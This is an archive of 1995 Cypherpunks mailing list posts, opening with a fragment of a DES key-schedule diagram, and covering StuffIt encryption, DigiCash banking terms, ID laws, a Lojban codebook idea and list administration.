2--------6------58 50 42 34 26 18 10  2                  9 10 11 12 13 14 15 16
3--------5------59 51 43 35 27 19 11  3                 17 18 19 20 21 22 23 24
4--------4------60 52 44 36 ----------- (C(28))         25 26 27 28
 
                                                        D
                                                        Block (28 bits)
 
7--------1------63 55 47 39 31 23 15  7                  1  2  3  4  5  6  7  8
6--------2------62 54 46 38 30 22 14  6                  9 10 11 12 13 14 15 16
5--------3------61 53 45 37 29 21 33  5                 17 18 19 20 21 22 23 24
4-------(D(25)--------------28 20 12  4                 25 26 27 28
 
8--------0------64 56 48 40 32 24 16  8         LS      (parity)
 
Input Byte      8  7  6  5  4  3  2   1 
 
Note that bit 4 is used as input for both C and D.  This implies that C(28)
output is used as the serial input to D(25).  The least significant bit is
used for odd parity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 25 Oct 95 09:05:14 PDT
To: Adam Shostack <adam@homeport.org>
Subject: Re: Does your software?
In-Reply-To: <199510251358.JAA24328@homeport.org>
Message-ID: <Pine.SUN.3.90.951025105835.29240A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I must disagre here and side with *gasp* FC.
If your so called *secure* server happens to get broken into by grace of 
god, you want to know at least where the attack came from. If Netscape
wants to hide internet hostnames they would to well setting up to DNS 
servers, one for internal resolutions where IPs resolve to their real 
hostname, and one in front of the firewall that resolves all IP's to 
unkown.netscape.com.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Wed, 25 Oct 1995, Adam Shostack wrote:

> 	This is a failure in the (TCP wrappers?) that should be
> reconfigured.
> 
> 	Since the service you are providing is available without any
> authentication, there is no reason to match hostnames to IPs with a
> double reverse lookup.
> 
> 	Since your server is secure, what does it really matter where
> the connections are coming from?  If netscape chooses to hide host
> information, they should be allowed to.
> 
> 	Cypherpunk relevance?  Its wrong to demand authentication when
> you don't care.  Airports, bars, 'anonymous' FTP servers and the like
> should all take the level of authentication they need.
> 
> Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: leonardr@aladdinsys.com (Leonard Rosenthol)
Date: Wed, 25 Oct 95 11:01:57 PDT
To: Marshall Clow <tbyfield@panix.com (t byfield)
Subject: Re: Quick commercial package question
Message-ID: <v02130536acb3c756715c@[204.147.235.198]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 PM 10/24/95, Marshall Clow wrote:
>>        http://www.uccs.edu/~abusby/mac_u-g/RemoveIt.sit.bin
>>
        I also just checked this out, and I as the engineer currently
responsible for StuffIt (and having worked on it for a number of years), I
can tell you that the thing simply won't work as documented.   I'll even
explain why...

        StuffIt actually encrypts data (it doesn't just password protect
it), but it does so using a COMPLETELY RANDOM key and then that random key
is encrypted using the password that the user entered (user key) and then
stored in the MKey resource.  We do this so that the same file encrypted
with the same "user key" doesn't generate the same data (and therefore aid
in easier breaking).   So by replacing an archive's MKey resource, only
means that you can manipulate an encrypted archive (delete things, etc.)
BUT it still won't decrypt your data, since the original encryption key is
not present.

        If you know the person who wrote or posted the information, please
feel free to forward my message along to him.


Thanks,
Leonard Rosenthol

-----------------------------------------------------------------------------
Leonard Rosenthol                     Internet:        leonardr@aladdinsys.com
Director of Advanced Technology       AppleLink:       MACgician
Aladdin Systems, Inc.                 America Online:  MACgician






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 25 Oct 95 08:11:20 PDT
To: <cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <9510251511.AA22095@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Another data point:

This week I flew TWA from Boston to St. Louis, then TW Express from
St. Louis to Champaign, Ill, and back.

I was asked for picture ID when boarding at Boston, but at no other time.
I protested, and was told that my alternative was not to fly. Since I was
travelling on business and my employer's dime, I did not want to risk
missing the flight, so I complied.

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 25 Oct 95 09:50:48 PDT
To: jirib@cs.monash.edu.au
Subject: Re: A secure cryptosystem with a 40-bit key?
In-Reply-To: <199510250657.QAA10183@sweeney.cs.monash.edu.au>
Message-ID: <199510251650.MAA24629@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum writes:
>.u'u I believe that you were wrong when you expressed a symbol for the
>list of forms of structure words. There are also words of the form V'V.
>
>On the other hand, however, not all letter combinations are permitted;
>eg there are only fourteen dipthongs (of which only four are "normal").

Well, I was definitely oversimplifying things.

>> The grammar of the language is *so* regularized that they are able to
>> give a YACC description for it.
>
>Yeah, and a huge beast it is. If you can make a YACCable language with
>one page of rules (say 16 :-) ), *then* I'll be impressed.

I'm sure that one could be done on one page, but I doubt it would have
the expressive power of a natural language *and* the lack of ambiguity
of Lojban.

>Would you believe two grammars for mathematical expressions? No? Good!
>There are three (infix, prefix and postfix).

And there's feedback between MEX and the non-MEX grammar since there
are cmavo which covert MEX into sumti and selbri and vice versa.

>> A message written entirely using native Lojban words can be encrypted
>> in a codebook fashion where the particular codebook to be used is a
>...
>
>You have to be careful here - the structure words (cmavo) are divided
>into groups (selma'o) which have different gramatical functions.
>You can't mix up members of different selma'o (in general), so you'd
>have to permute within each separately.
>
>Some of these selma'o have very few members (even just one) and/or
>may of themselves reveal information.

To achieve the goal of the cryptosystem it may not be necessary to
encode the cmavo, since they have no real meaning on their own, just
the gismu and rafsi.  The goal is to hide the *meaning*, not the
structure.

The selma'o that only have one member are especially meaning-free, as
they're typically elidable terminators and such.

>> This system has the interesting property that *any* plaintext with the
>> same grammatical structure is a potential encryption of a given
>> cyphertext.
>...
>
>Yes, but the grammatical structure itself may reveal heaps.
>(Except for trivial statements.)

In a natural language this might be true, but in Lojban the grammar's
regularity eliminates much of this information.  In English it's
"strange" to say "the red big dog", while "the big red dog" is fine.
Lojban doesn't have these features.  Lojban bridi are essentially
the same as function calls in a programming language, from a grammatical
perspective.  The only distinguishing feature of a selbri is the number
of sumti that it takes, and it's unusual for all of them to be specified,
and extra ones may be added using the BAI selma'o.

>> This works well in Lojban because it never changes word forms based on
>> grammatical usage.  Most natural language declensions and conjugations
>> would make the encrypted message ungrammatical, and make it *much* more
>...
>
>Not really; you just need to make sure that you conjugate the coded words.
>(Ie substitute nouns for nouns, verbs for verbs, etc.)

Irregularities make this nearly impossible for computers, though.

There are also problems due to ambiguity.

The even bigger inconvenience with natural laguages comes in defining
the codebook.  The limited forms of Lojban gismu and rafsi makes the
whole dictionary a well-defined list, permitting the codebook to be
specified as a single number that anyone could use --- even without
prior exchange of the wordlist.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 25 Oct 95 11:58:17 PDT
To: dsmith@midwest.net (David E. Smith)
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510251759.MAA01488@cdale1.midwest.net>
Message-ID: <199510251851.LAA24113@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	As if that would help. I wrote on Monday and have received no
response. (I asked about the pricing structure and the difference
between merchant and non-merchant accounts.)

	Has anyone received a reply from ftrotter?

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >This is for a "WorldCurrency Access Interest Account", which I don't
> >think is what is used for ecash.  For ecash the account opening fee is
> >$11 and the per-month fee is $5.  I don't see any reference to required
> >account minimums.
> 
> Aha.  That's where I got the $11 figure from.  I suppose I should
> try actually _reading_ all the fine print :)
> 
> IANAL, but then I never claimed to be.
> 
> I'll be writing to Mark Twain's contact ("ftrotter@marktwain.com")
> and try to figure out just what the deal is.
> 
> Dave
> - ----- David E. Smith, "dsmith@midwest.net", PGP ID 0c92732139
> http://www.midwest.net/scribers/dsmith/
> Sorry, the full signature is being interrogated by news.admin.net-abuse.misc
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMI5y7AwyfvCScyE5AQEn7wQAoUT/6fBZcUSM5eT7HYnY0Tx5Q35Q4aeB
> a2lTJWnMRta5i16qCtKF/0OiK/9bfs0i3FQqUMpireXp7YZn5n0D83mr+AWuJZBc
> +0170zWpsVZElAoZU8ZPV06PDQwuraH2pmdBMt9Kfabi4w4BGbqJ3E4rYvhx95dj
> hWnAp+6RzJg=
> =IM+h
> -----END PGP SIGNATURE-----
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 25 Oct 95 09:20:01 PDT
To: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Subject: Re: Mandatory ID in California?
Message-ID: <199510251617.MAA23789@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 AM 10/25/95 -0700, Ian Goldberg wrote:

>"The officer, in accordance with police policy, arrested Burton
>for refusing to properly identify himself."
><snip>
>
>That last sentence seemed ominous to me...

This has been chatted about for years.  Under California law, failure to
identify yourself is a minor violation.  They always dismiss the next day at
your hearing.  You don't have to carry ID, you just have to identify
yourself (there's a difference).  "my name Jose Jimenez."  You still don't
need ID unless you are operating a motor vehicle on public streets and roads
(or maybe catching a plane).

DCF

"The average seasoned citizen pays a higher percentage of his income for
medical expenses today than he did in 1964 before the passage of Medicaid."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Wed, 25 Oct 95 12:18:03 PDT
To: cypherpunks@toad.com
Subject: Welcome to cypherpunks
Message-ID: <9510251917.AA27873@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks cypherpunks@toad.com

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as is
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 25 Oct 95 10:30:39 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
Message-ID: <199510251759.MAA01488@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>This is for a "WorldCurrency Access Interest Account", which I don't
>think is what is used for ecash.  For ecash the account opening fee is
>$11 and the per-month fee is $5.  I don't see any reference to required
>account minimums.

Aha.  That's where I got the $11 figure from.  I suppose I should
try actually _reading_ all the fine print :)

IANAL, but then I never claimed to be.

I'll be writing to Mark Twain's contact ("ftrotter@marktwain.com")
and try to figure out just what the deal is.

Dave
- ----- David E. Smith, "dsmith@midwest.net", PGP ID 0c92732139
http://www.midwest.net/scribers/dsmith/
Sorry, the full signature is being interrogated by news.admin.net-abuse.misc


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI5y7AwyfvCScyE5AQEn7wQAoUT/6fBZcUSM5eT7HYnY0Tx5Q35Q4aeB
a2lTJWnMRta5i16qCtKF/0OiK/9bfs0i3FQqUMpireXp7YZn5n0D83mr+AWuJZBc
+0170zWpsVZElAoZU8ZPV06PDQwuraH2pmdBMt9Kfabi4w4BGbqJ3E4rYvhx95dj
hWnAp+6RzJg=
=IM+h
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 25 Oct 95 09:30:04 PDT
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <199510250551.WAA29912@netcom12.netcom.com>
Message-ID: <9510251629.AA11820@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>1.  Both parties stipulate that their relationship is a 
>    business relationship and not a fiduciary relationship.

Perhaps someone with US legal experience might care to comment 
on the enforceability of such a clause. Surely the nature of
the relationship is defined by its character and not soley by 
a contract disclaimer.

>2.  Your account is not FDIC insured. 

Good luck then!

>3.  The bank accepts no liability for anything going wrong, 
>    although it may, at its sole option, attempt to make
>    ammends.

Wouldn't it be convenient if such clauses were enforcable?

>4.  Parties agree to wave a jury trial.
>
>5.  Parties agree to binding arbitration. 

These seem pretty dangerous to me if enforcable. They would 
effectively usurp the power of the courts as arbiter. Although
I have less confidence in the competence of a jury than that
of judges I'm pretty sure that the UK courts would consider
such contract clauses in a dim light.

>6.  General waffling to the effect that the tiny fees collected
>    imply an equally tiny responsiblity and potential liability
>    on the part of the bank.  

Hmm, wana bet?


This is not a commercial contract between buisnesses it is clearly 
offering a consumer service. It is not the result of informed
negotiation between sides armed with lawyers, it is a very one sided
contract. This brings up a major problem with Chaum's schemes,
there has to be trust in the financial institution. Contracts such
as this do not inspire confidence. Mark Twain bank have a
confidence problem in any case, when I mentioned their name
as DigiCash licensees to an audience yesterday they laughed.

>One wonders whether signing away all responsibilty on the part of
>the bank is going to be the standard for using digital money
>on the Internet, or whether consumers will demand protection
>when using these new services.  

Consumers have votes, they are not afraid of regulation. Forget
the pap you see spouted by politicians about deregulation, they
simply mean remove the regulations that negatively affect our 
interests, their supporters are likewise. 

It is ironic that the Credit card cos biggest advantage in 
cyberspace and other mail order turns out to be the $50 limit 
on consumer exposure to loss. This is another side of regulation
E that people don't mention so often.

Lets wait a while and see how long it takes for the Fed to ring
up "dear boy, we have a few questions....".


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@doemail.sbi.com>
Date: Tue, 24 Oct 95 20:34:49 PDT
To: cypherpunks@toad.com
Subject: Quick commercial package question
Message-ID: <Pine.SUN.3.91.951025122602.8492M-100000@doe905f>
MIME-Version: 1.0
Content-Type: text/plain



Just a brief question.

  There's a compression/archiving package on the Mac call Stuffit. It
comes in the usual Lite (get free then register) and Deluxe (money first,
product later) flavours. It offers, amongst it's options, an encryption
option on a 'per archive entry'. This means you can have an archive with a
mix of encrypted and unencrypted files and folders, all in the same
archive. 

  Question is - does anyone know anything about the strength or
trustability of the encryption algorithm used ? It's freely exportable
from the US (or so I thought) so it can't be DES. Is it (down) on a level
with the MS Word or Wordperfect ciphers, or is it a little better ? How
far should I trust it ? 

-Jon

--
  Jonathon Fletcher,        "these opinions are my own, no-one else's"
  jonathon@japan.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 25 Oct 95 09:53:17 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951025100419.15559D-100000@viper.law.miami.edu>
Message-ID: <199510251652.MAA08998@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> I agree strongly with Tim May that this (fun) little joke has gone far
> enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
> the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
> the experience, post it on the web somewhere (I'll provide a space if you
> need it), and call it a day. 

I was unaware, Mr. Froomkin, that the legal system of our country had
the right to arbitrarily ignore its own rules and refuse to answer a
question. The munitions T-Shirt was not, in my opinion, substantially
more frivolous than Phil Karn's floppy, which was rejected. I do not
believe that the state department has the right to reject such things
by refusing to accept their mail, and I do not believe that they have
the right to violate their own proceedures. If someone asks "is this
captain midnight decoder ring exportable" they are legally obligated
to answer, one way or the other, unless we live under a government of
men, and not laws.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 25 Oct 95 10:59:24 PDT
To: perry@piermont.com
Subject: Re: Reformated: How secure....
In-Reply-To: <199510242307.TAA07020@jekyll.piermont.com>
Message-ID: <199510251759.NAA26251@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:
>Amateurs pretending that they are professionals going out and selling
>snake-oil crypto are one of the biggest threats in our business.

and then...

>I suspect it would take a real cryptographer very little effort to
>break your system, but that no one will bother doing so because it
>isn't really worth anyone's time.

Well, Perry, if it's really such a threat, isn't it worth someone's
time to combat it?

Wasn't that point driven home by the Netscape PRNG problems?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 25 Oct 95 10:25:00 PDT
To: asb@nexor.co.uk (Andy Brown)
Subject: Re: Does your software?
In-Reply-To: <Pine.SOL.3.91.951025132835.16584C-100000@eagle.nexor.co.uk>
Message-ID: <9510251721.AA00948@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> On Tue, 24 Oct 1995, Dr. Frederick B. Cohen wrote:
> 
> > Actually, not true.  The global fixed-length buffers, shared variables,
> > and lack of prototypes provide protection against allocation problems
> > which sould result in denial of service, corruptions at near-capacity
> > load, and other similar security problems.
> 
> Please explain how a lack of prototypes (and shared variables for that 
> matter) provide protection against the problems you describe.

The design of the server is documented in a white paper stored in our
W3 server.  Look under the URL below and select:

	Management Analytics -> Software -> Daemons -> White Paper

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 25 Oct 95 12:30:11 PDT
To: hallam@w3.org
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <9510251629.AA11820@zorch.w3.org>
Message-ID: <199510251929.NAA19138@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Phil <hallam@w3.org>" allegedly wrote:
>
> Perhaps someone with US legal experience might care to comment 
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> on the enforceability of such a clause.


That's not me, but I have some things to say anyway.  If I could
figure out how to make DigiCash's SunOS client write money into
ASCII files I would attach 2 cybercents to the end of this.


> Surely the nature of
> the relationship is defined by its character and not soley by 
> a contract disclaimer.


I prefer to think that contractual relationships are defined by
the explicit stipulations the contract, and the implicit understandings
between the two parties (which are unavoidable, since they begin at
the semantic or even cognitive level and cannot be described
explicitly with our current science/tech, but which should be made
explicit wherever possible), and are completely *un*-influenced by
the arbitrary opinion of some third organization which happens to
own lots of big guns in their geographical regions.


> >3.  The bank accepts no liability for anything going wrong, 
> >    although it may, at its sole option, attempt to make
> >    ammends.
> 
> Wouldn't it be convenient if such clauses were enforcable?


Wouldn't be nice if whatever clauses two competent entities agreed
to were enforceable?  (non-repudiation, reputations, Nick
Szabo's "liens"...)


> >4.  Parties agree to wave a jury trial.
> >
> >5.  Parties agree to binding arbitration. 
> 
> These seem pretty dangerous to me if enforcable. They would 
> effectively usurp the power of the courts as arbiter.


Indeed they do usurp that power, don't they?  :-)  <I smile happily.>
And it's only going to get worse(/better).  ((anon)nymity, e-cash, tax 
evasion, black markets...)


> Although
> I have less confidence in the competence of a jury than that
> of judges I'm pretty sure that the UK courts would consider
> such contract clauses in a dim light.


And I, by way of contrast, consider such clauses, which remove
business relationships from the realm of violence and into the realm
of mutually consensual, organizationally emergent social structures, 
in a very positive light.


> Consumers have votes, they are not afraid of regulation. Forget
> the pap you see spouted by politicians about deregulation, they
> simply mean remove the regulations that negatively affect our 
> interests, their supporters are likewise. 


And I'm of the opinion that any "regulation" (i.e. threat of force
against peaceful parties) negatively affects my interests (all of
ours) in the long run.  And I too have a vote.


Crypto relevance?  Much!  The overview is that crypto tech will
ultimately enable my view of ideal social structure rather than
yours.  Non-repudiation, e-cash, Nick Szabo's "liens", tax evasion,
black markets, (anon)nymity, reputations and (hopefully hopefully) 
the education/enlightenment of the populace because of powerful
non-censorable information access all point this way.


Of course, it will be a long, twisted road from here to there (we
live in interesting times), but I am ultimately hopeful.


I hope this rant is not wholely without value.  I do it rarely, so 
you are safe for another few months now that I have it out of my 
system.


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMI6P9/WZSllhfG25AQHl9wQAmOWc0PiNbeKaT0Ow1d63g5bdQ2A0417D
nXlv3T4olwymwTiB3oWv4t28LPIkKwl2dCm6xLduk1+8z5t7rwZCUYRc91t7ro58
8y6yZOvSRvupKm9IUu5l/Nhmd2uv4TpHQKq11UfCaxUmXdxeZ8AS5RrB1uq51BUM
ctATwNuH08c=
=WJ/H
-----END PGP SIGNATURE-----

rom owner-cypherpunks  Wed Oct 25 12:30:03 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA28197; Wed, 25 Oct 95 12:30:03 PDT
Received: from larry.infi.net by toad.com id AA28174; Wed, 25 Oct 95 12:29:42 PDT
Received: by larry.infi.net (Infinet-S-3.3)
	id PAA04999; Wed, 25 Oct 1995 15:29:21 -0400
Date: Wed, 25 Oct 1995 15:29:20 -0400 (EDT)
From: Alan Horowitz <alanh@infi.net>
To: Duncan Frissell <frissell@panix.com>
Cc: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>, cypherpunks@toad.com
Subject: Re: Mandatory ID in California?
In-Reply-To: <199510251617.MAA23789@panix.com>
Message-Id: <Pine.SV4.3.91.951025152409.3136C-100000@larry.infi.net>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk

"States may not authorize arrest...for failing to produce identification..."
       Kolender v. Lawson 461 U.S. 352 (1983)

"...may not compel an answer and they must allow the person to leave 
after a reasonable brief period of time...."  - - ibid


California is the Ninth Circuit, no?  See, inter alia,  Martinelli v. 
City of Beaumont, 820 F.2nd 1491 (1987).

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 25 Oct 95 06:33:11 PDT
To: cypherpunks@toad.com
Subject: Re: Does your software?
In-Reply-To: <9510241747.AA02533@all.net>
Message-ID: <Pine.SOL.3.91.951025132835.16584C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Dr. Frederick B. Cohen wrote:

> Actually, not true.  The global fixed-length buffers, shared variables,
> and lack of prototypes provide protection against allocation problems
> which sould result in denial of service, corruptions at near-capacity
> load, and other similar security problems.

Please explain how a lack of prototypes (and shared variables for that 
matter) provide protection against the problems you describe.


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 25 Oct 95 10:25:56 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: BlackNet in "Hardware"
Message-ID: <9510251725.AA25057@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> I recollect that the Amiga had some gizmo--I think it was called
> "MagicSack" or something like that--that let it run Macintosh programs,
> sort of. It never really caught on, at least as an alternative to real
> Macs. And I think something similar was available for DOS. This was all
> several years back, before the Amiga faded out.
> 
> Amiga users and former Amiga users can probably tell us more.
> 
> --Tim May

The Amiga 2000 had two sets of slots - one for amiga-specific cards,
and one for PC cards. Some of these slots lined up, and you could 
slip in a 'Bridgeboard' which carried an Intel processor.  It could
access the PC slots, the amiga IO, and had it's own disk partitions. 
There were mechanisms for the two processors to exchange data as 
well.

I *think* there was a similar MAC product as well, or at least a board
which could carry MAC ROMs, and used the Amiga 68000 processor.

So the  answer is: yes, the Amiga could do that. It also had long
filenames, thousands of colors, true preemptive multitasking, stereo
sound, a DSP coprocessor,and many other neat features years before
they were available on other consumer systems, as well as display
quality and features still unavailable on any system even near its 
pricepoint.

But - Commodore's marketing department couldn't sell ice in the
Sahara.

I'll stop now, or I'll start mourning for TOPS-20 as well...


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Wed, 25 Oct 95 13:33:34 PDT
To: "WWW-Buyinfo" <cypherpunks@toad.com
Subject: Re: Privacy Marketing
Message-ID: <v02110107acb44bce2ca1@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>         Reply to:   RE>Privacy Marketing
>
>Nick -
>
>I read your well-reasoned and articulate post just after sending my own (much
